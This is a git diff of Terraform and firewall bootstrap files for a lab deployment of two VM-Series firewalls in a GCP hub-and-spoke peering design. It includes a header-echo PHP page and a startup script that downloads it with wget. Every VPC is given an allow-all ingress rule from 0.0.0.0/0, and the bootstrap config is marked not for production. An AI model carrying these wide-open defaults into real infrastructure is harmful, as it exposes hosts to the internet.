web-server - 80 - + @@ -789,13 +759,40 @@ DO NOT USE FOR PRODUCTION any - 10.5.1.4 + any - service-http + service-tcp-222 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + trust-zone + + + trust-zone + + + any + + + any + + any ipv4 - no - + @@ -807,7 +804,7 @@ DO NOT USE FOR PRODUCTION untrust-zone - any + trust-zone any @@ -824,7 +821,12 @@ DO NOT USE FOR PRODUCTION deny - yes + no + yes + + + deny + no yes @@ -955,16 +957,40 @@ DO NOT USE FOR PRODUCTION
- - 10.5.2.5 + + 10.10.2.2 - web + spoke2-vpc - - 10.5.3.5 + + 10.10.1.2 - database + spoke1-vpc + + + + 10.10.1.0/24 + + spoke1-vpc + + + + 10.10.2.0/24 + + spoke2-vpc + + + + 192.168.1.2 + + + 192.168.1.3 + + + 10.10.1.100 + + spoke1-vpc
@@ -973,27 +999,24 @@ DO NOT USE FOR PRODUCTION ethernet1/1 ethernet1/2 - ethernet1/3 - - color13 + + color3 - - color15 + + color24 - color19 - - - color17 + color20 - - color6 + + color13 +
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/guide.pdf b/gcp/adv_peering_2fw_2spoke/guide.pdf new file mode 100644 index 00000000..227722c9 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/guide.pdf differ diff --git a/gcp/adv_peering_2fw_2spoke/images/diagram.png b/gcp/adv_peering_2fw_2spoke/images/diagram.png new file mode 100644 index 00000000..8ba1308e Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/diagram.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/directory.png b/gcp/adv_peering_2fw_2spoke/images/directory.png new file mode 100644 index 00000000..b45b470e Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/directory.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/peering.png b/gcp/adv_peering_2fw_2spoke/images/peering.png new file mode 100644 index 00000000..057ac136 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/peering.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/routes.png b/gcp/adv_peering_2fw_2spoke/images/routes.png new file mode 100644 index 00000000..d6fb5d4a Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/routes.png differ diff --git a/gcp/adv_peering_2fw_2spoke/images/web.png b/gcp/adv_peering_2fw_2spoke/images/web.png new file mode 100644 index 00000000..ae0534d5 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/web.png differ diff --git a/gcp/adv_peering_2fw_2spoke/main.tf b/gcp/adv_peering_2fw_2spoke/main.tf new file mode 100644 index 00000000..c0bf8e83 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/main.tf @@ -0,0 +1,136 @@ +provider "google" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" +} + +#************************************************************************************ +# CREATE VPCS - MGMT, UNTRUST, TRUST +#************************************************************************************ +module "vpc_mgmt" { + source = "./modules/create_vpc/" + vpc_name = "mgmt-vpc" + subnetworks = ["mgmt-subnet"] + ip_cidrs = ["192.168.0.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_untrust" { + source = "./modules/create_vpc/" + vpc_name = "untrust-vpc" + subnetworks = ["untrust-subnet"] + ip_cidrs = ["192.168.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/create_vpc/" + vpc_name = "trust-vpc" + subnetworks = ["trust-subnet"] + ip_cidrs = ["192.168.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP +#************************************************************************************ +module "bootstrap" { + source = "./modules/create_bootstrap_bucket/" + bucket_name = "vmseries-adv-peering" + randomize_bucket_name = true + file_location = "bootstrap_files/" + + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) +#************************************************************************************ +module "vm_fw" { + source = "./modules/create_vmseries/" + fw_names = ["vmseries01", "vmseries02"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"] + + fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.0.2", "192.168.0.3"] + fw_nic2_ip = ["192.168.2.2", "192.168.2.3"] + + fw_bootstrap_bucket = "${module.bootstrap.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER +#************************************************************************************ +module "vmseries_public_lb" { + source = "./modules/create_public_lb/" + name = "vmseries-lb" + + backends = { + "0" = [ + { + group = "${module.vm_fw.instance_group[0]}" + }, + { + group = "${module.vm_fw.instance_group[1]}" + }, + ] + } + + backend_params = [ + "/,http,80,10", // health check path, port name, port number, timeout seconds. + ] +} + +#************************************************************************************ +# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2 +#************************************************************************************ +resource "google_compute_route" "default" { + count = "${length(module.vm_fw.fw_names)}" + name = "default-to-${module.vm_fw.fw_names[count.index]}" + dest_range = "0.0.0.0/0" + network = "${module.vpc_trust.vpc_self_link}" + next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}" + priority = 100 +} + +#************************************************************************************ +# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2 +#************************************************************************************ +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "trust-to-spoke1" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke1.vpc_self_link}" +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "trust-to-spoke2" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke2.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.trust_to_spoke1", + ] +} diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf new file mode 100644 index 00000000..bfe60b19 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf @@ -0,0 +1,120 @@ +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${length(var.config) > 0 ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${length(var.content) > 0 ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${length(var.license) > 0 ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${length(var.software) > 0 ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${length(var.config) == 0 ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${length(var.content) == 0 ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${length(var.license) == 0 ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${length(var.software) == 0 ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${google_storage_bucket.bootstrap.name}" +} diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf new file mode 100644 index 00000000..961faca1 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf @@ -0,0 +1,168 @@ + +variable project { + description = "The project to deploy to, if not set the default provider project is used." + default = "" +} + +variable ip_version { + description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4" + default = "" +} + +variable name { + description = "Name for the forwarding rule and prefix for supporting resources" +} + +variable backends { + description = "Map backend indices to list of backend maps." + type = "map" +} + +variable backend_params { + description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds" + type = "list" +} + +variable backend_protocol { + description = "The protocol with which to talk to the backend service" + default = "HTTP" +} + +variable create_url_map { + description = "Set to `false` if url_map variable is provided." + default = true +} + +variable url_map { + description = "The url_map resource to use. Default is to send all traffic to first backend." + default = "" +} + +variable http_forward { + description = "Set to `false` to disable HTTP port 80 forward" + default = true +} + +variable ssl { + description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs" + default = false +} + +variable private_key { + description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable certificate { + description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable use_ssl_certificates { + description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`" + default = false +} + +variable ssl_certificates { + type = "list" + description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided." + default = [] +} + +variable security_policy { + description = "The resource URL for the security policy to associate with the backend service" + default = "" +} + +variable cdn { + description = "Set to `true` to enable cdn on backend." + default = "false" +} + + +resource "google_compute_global_forwarding_rule" "http" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}" + target = "${google_compute_target_http_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "80" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_forwarding_rule" "https" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https" + target = "${google_compute_target_https_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "443" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_address" "default" { + project = "${var.project}" + name = "${var.name}-address" + ip_version = "${var.ip_version}" +} + +# HTTP proxy when ssl is false +resource "google_compute_target_http_proxy" "default" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}-http-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" +} + +# HTTPS proxy when ssl is true +resource "google_compute_target_https_proxy" "default" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" + ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"] +} + +resource "google_compute_ssl_certificate" "default" { + project = "${var.project}" + count = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}" + name_prefix = "${var.name}-certificate-" + private_key = "${var.private_key}" + certificate = "${var.certificate}" + + lifecycle = { + create_before_destroy = true + } +} + +resource "google_compute_url_map" "default" { + project = "${var.project}" + count = "${var.create_url_map ? 1 : 0}" + name = "${var.name}" + default_service = "${google_compute_backend_service.default.0.self_link}" +} + +resource "google_compute_backend_service" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-backend-${count.index}" + port_name = "${element(split(",", element(var.backend_params, count.index)), 1)}" + protocol = "${var.backend_protocol}" + timeout_sec = "${element(split(",", element(var.backend_params, count.index)), 3)}" + backend = ["${var.backends["${count.index}"]}"] + health_checks = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"] + security_policy = "${var.security_policy}" + enable_cdn = "${var.cdn}" +} + +resource "google_compute_http_health_check" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-check-${count.index}" + request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}" + port = "${element(split(",", element(var.backend_params, count.index)), 2)}" +} + +output "address" { + value = "${google_compute_global_address.default.address}" +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf new file mode 100644 index 00000000..dd140b46 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf @@ -0,0 +1,127 @@ +variable vm_names { + type = "list" +} +variable vm_machine_type {} +variable vm_zones { + type = "list" +} +variable vm_ssh_key {} + +variable vm_image {} +variable vm_subnetworks { + type = "list" +} + +variable vm_scopes { + type = "list" + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + + +variable internal_lb_create { + default = false +} + +variable "internal_lb_health_check" { + default = "22" +} + +variable "internal_lb_ports" { + type = "list" + default = ["80"] +} + +variable "internal_lb_name" { + default = "intlb" +} + +variable "internal_lb_ip" { + default = "" +} + +variable create_instance_group { + default = false +} + +variable startup_script { +default = "" +} + + +resource "google_compute_instance" "vm" { + count = "${length(var.vm_names)}" + name = "${element(var.vm_names, count.index)}" + machine_type = "${var.vm_machine_type}" + zone = "${element(var.vm_zones, count.index)}" + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = "${var.startup_script}" + + + metadata { + serial-port-enable = true + sshKeys = "${var.vm_ssh_key}" + } + + network_interface { + subnetwork = "${element(var.vm_subnetworks, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.vm_image}" + } + } + + service_account { + scopes = "${var.vm_scopes}" + } +} + +resource "google_compute_instance_group" "instance_group" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-group" + zone = "${var.vm_zones[0]}" + + instances = [ + "${google_compute_instance.vm.*.self_link}", + ] +} + + + + +resource "google_compute_health_check" "health_check" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-check-${count.index}" + + tcp_health_check { + port = "${var.internal_lb_ports[0]}" + } +} + +resource "google_compute_region_backend_service" "backend_service" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-backend-${count.index}" + health_checks = ["${google_compute_health_check.health_check.self_link}"] + + backend { + group = "${google_compute_instance_group.instance_group.self_link}" + } +} + + +resource "google_compute_forwarding_rule" "forwarding_rule" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-tcp" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lb_ip}" + ports = "${var.internal_lb_ports}" + subnetwork = "${var.vm_subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service.self_link}" +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf new file mode 100644 index 00000000..8a87285a --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_vmseries/main.tf @@ -0,0 +1,176 @@ +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${length(var.fw_names)}" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + access_config = {} + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] + + named_port { + name = "http" + port = "80" + } +} + + + + + + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${google_compute_instance_group.vmseries.*.self_link}" +} + + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf new file mode 100644 index 00000000..e4511595 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/modules/create_vpc/main.tf @@ -0,0 +1,71 @@ +variable vpc_name {} + +variable subnetworks { + type = "list" +} + +variable ip_cidrs { + type = "list" +} + +variable regions { + type = "list" +} + +variable ingress_allow_all { + default = true +} + +variable ingress_sources { + type = "list" + default = ["0.0.0.0/0"] +} + +resource "google_compute_network" "default" { + name = "${var.vpc_name}" + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = "${length(var.subnetworks)}" + name = "${element(var.subnetworks, count.index)}" + ip_cidr_range = "${element(var.ip_cidrs, count.index)}" + region = "${element(var.regions, count.index)}" + network = "${google_compute_network.default.self_link}" +} + +resource "google_compute_firewall" "ingress_all" { + count = "${var.ingress_allow_all}" + name = "${google_compute_network.default.name}-ingress-all" + network = "${google_compute_network.default.self_link}" + direction = "INGRESS" + source_ranges = "${var.ingress_sources}" + + allow { + protocol = "all" + } +} + +output "subnetwork_id" { + value = "${google_compute_subnetwork.default.*.id}" +} + +output "subnetwork_name" { + value = "${google_compute_subnetwork.default.*.name}" +} + +output "subnetwork_self_link" { + value = "${google_compute_subnetwork.default.*.self_link}" +} + +output "vpc_name" { + value = "${google_compute_network.default.*.name}" +} + +output "vpc_id" { + value = "${google_compute_network.default.*.id[0]}" +} + +output "vpc_self_link" { + value = "${google_compute_network.default.*.self_link[0]}" +} diff --git a/gcp/adv_peering_2fw_2spoke/outputs.tf b/gcp/adv_peering_2fw_2spoke/outputs.tf new file mode 100644 index 00000000..dec2a032 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/outputs.tf @@ -0,0 +1,37 @@ +#************************************************************************************ +# OUTPUTS +#************************************************************************************ +output " IMPORTANT!! PLEASE READ!! " { + value = [ + "===================================================================================", + "Before proceeding, you must enable import/export custom routes on all peering links", + "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs", + "==================================================================================="] +} +output "GLB-ADDRESS " { + value = "http://${module.vmseries_public_lb.address}" +} + +output "MGMT-URL-FW1 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[0]}" +} + +output "MGMT-URL-FW2 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[1]}" +} + +output "SSH-SPOKE1-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i " +} + +output "SSH-SPOKE2-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i " +} + +output "SSH-SPOKE1-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i " +} + +output "SSH-SPOKE2-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i " +} diff --git a/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh new file mode 100644 index 00000000..1349754f --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh @@ -0,0 +1,7 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2 php7. libapache2-mod-php7.; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done diff --git a/gcp/adv_peering_2fw_2spoke/spoke1.tf b/gcp/adv_peering_2fw_2spoke/spoke1.tf new file mode 100644 index 00000000..fbbe81ec --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/spoke1.tf @@ -0,0 +1,61 @@ +provider "google" { + credentials = "${var.spoke1_project_authfile}" + project = "${var.spoke1_project}" + region = "${var.region}" + alias = "spoke1" +} + +#************************************************************************************ +# CREATE SPOKE2 VPC & SPOKE1 VMs (w/ INTLB) +#************************************************************************************ +module "vpc_spoke1" { + source = "./modules/create_vpc/" + vpc_name = "spoke1-vpc" + subnetworks = ["spoke1-subnet"] + ip_cidrs = ["10.10.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke1" + } +} + +module "vm_spoke1" { + source = "./modules/create_vm/" + vm_names = ["spoke1-vm1", "spoke1-vm2"] + vm_zones = ["${var.region}-a", "${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" // default "" - runs no startup script + + internal_lb_create = true // default false + internal_lb_name = "spoke1-intlb" // default "intlb" + internal_lb_ports = ["80", "443"] // default ["80"] + internal_lb_ip = "10.10.1.100" // default "" (assigns an any available IP in subnetwork ) + + providers = { + google = "google.spoke1" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE1-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "spoke1-to-trust" + network = "${module.vpc_spoke1.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.trust_to_spoke2", + ] + provider = "google.spoke1" +} diff --git a/gcp/adv_peering_2fw_2spoke/spoke2.tf b/gcp/adv_peering_2fw_2spoke/spoke2.tf new file mode 100644 index 00000000..718ff170 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/spoke2.tf @@ -0,0 +1,55 @@ +provider "google" { + credentials = "${var.spoke2_project_authfile}" + project = "${var.spoke2_project}" + region = "${var.region}" + alias = "spoke2" +} + +#************************************************************************************ +# CREATE SPOKE2 VPC & SPOKE2 VM +#************************************************************************************ +module "vpc_spoke2" { + source = "./modules/create_vpc/" + vpc_name = "spoke2-vpc" + subnetworks = ["spoke2-subnet"] + ip_cidrs = ["10.10.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke2" + } +} + +module "vm_spoke2" { + source = "./modules/create_vm/" + vm_names = ["spoke2-vm1"] + vm_zones = ["${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke2.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + + providers = { + google = "google.spoke2" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE2-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "spoke2-to-trust" + network = "${module.vpc_spoke2.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke1_to_trust", + ] + provider = "google.spoke2" +} diff --git a/gcp/adv_peering_2fw_2spoke/variables.tf b/gcp/adv_peering_2fw_2spoke/variables.tf new file mode 100644 index 00000000..f273131f --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/variables.tf @@ -0,0 +1,65 @@ +#************************************************************************************ +# GCP VARIABLES +#************************************************************************************ +variable "region" { + default = "us-east4" +} + +#************************************************************************************ +# main.tf 